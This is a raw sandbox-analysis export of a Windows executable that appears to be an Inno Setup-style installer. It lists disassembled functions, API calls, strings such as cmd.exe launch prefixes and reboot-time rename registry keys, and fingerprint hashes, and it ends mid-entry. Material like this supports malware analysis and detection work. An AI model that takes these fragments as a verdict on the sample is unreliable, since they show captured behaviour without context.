                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                  • String ID: t6B
                                                                  • API String ID: 183575631-3178735703
                                                                  • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                  • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                                  • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                  • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D

                                                                  Control-flow Graph

                                                                  control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(6FBF0000,SHGetFolderPathA), ref: 0047C75E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                                  • API String ID: 190572456-2091577475
                                                                  • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                  • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                                  • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                  • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD

                                                                  Control-flow Graph

                                                                  control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                  • API String ID: 3256987805-3653653586
                                                                  • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                  • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                  • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                  • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                  APIs
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$Prop
                                                                  • String ID: wA$yA
                                                                  • API String ID: 3887896539-1847240991
                                                                  • Opcode ID: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                  • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                                  • Opcode Fuzzy Hash: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                  • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A

                                                                  Control-flow Graph

                                                                  control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 0042F587
                                                                  • GetFocus.USER32 ref: 0042F58F
                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                                  • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                  • String ID: TWindowDisabler-Window
                                                                  • API String ID: 3167913817-1824977358
                                                                  • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                  • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                                  • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                  • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD

                                                                  Control-flow Graph

                                                                  control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                  • API String ID: 1646373207-2130885113
                                                                  • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                  • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                                  • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                  • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                                  APIs
                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                    • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                                    • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                  • String ID: c:\directory$shell32.dll
                                                                  • API String ID: 3376378930-1375355148
                                                                  • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                  • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                                  • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                  • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                                  APIs
                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                  • API String ID: 4130936913-2943970505
                                                                  • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                  • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                                  • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                  • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                                    • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                    • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                    • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                    • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                  • API String ID: 854858120-615399546
                                                                  • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                  • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                                  • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                  • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                                  APIs
                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                  • OemToCharA.USER32(?,?), ref: 00423754
                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                  • String ID: 2$MAINICON
                                                                  • API String ID: 3935243913-3181700818
                                                                  • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                  • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                                  • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                  • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                                    • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                    • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                    • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                    • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                    • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                    • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                    • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                                    • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                    • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                    • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                    • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                    • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                  • API String ID: 3864787166-2767913252
                                                                  • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                  • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                                  • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                  • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                                  APIs
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                  Similarity
                                                                  • API ID: LongWindow$Prop
                                                                  • String ID:
                                                                  • API String ID: 3887896539-0
                                                                  • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                  • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                                  • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                  • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                                  • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                                  • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID: p%G
                                                                  • API String ID: 2066263336-2885399958
                                                                  • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                  • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                                  • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                  • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                                  Strings
                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                                  • PendingFileRenameOperations, xrefs: 00455728
                                                                  • PendingFileRenameOperations2, xrefs: 00455758
                                                                  • WININIT.INI, xrefs: 004557B8
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                  • API String ID: 47109696-2199428270
                                                                  • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                  • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                                  • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                  • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                  • API String ID: 1375471231-2952887711
                                                                  • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                  • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                                  • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                  • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                                  APIs
                                                                  • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                  • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                  • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$EnumLongWindows
                                                                  • String ID: TAB
                                                                  • API String ID: 4191631535-3846439302
                                                                  • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                  • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                                  • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                  • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                                  APIs
                                                                  • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                  • API String ID: 588496660-1846899949
                                                                  • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                  • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                                  • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                  • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                                  Strings
                                                                  • Need to restart Windows? %s, xrefs: 0046BCB5
                                                                  • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                                  • NextButtonClick, xrefs: 0046BA6C
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                  • API String ID: 0-2329492092
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ActiveChangeNotifyWindow
                                                                  • String ID: $Need to restart Windows? %s
                                                                  • API String ID: 1160245247-4200181552
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                  • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                  • String ID: Creating directory: %s
                                                                  • API String ID: 2451617938-483064649
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressByteCharMultiProcWide
                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                  • API String ID: 2508298434-591603554
                                                                  APIs
                                                                  • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                  Strings
                                                                  Similarity
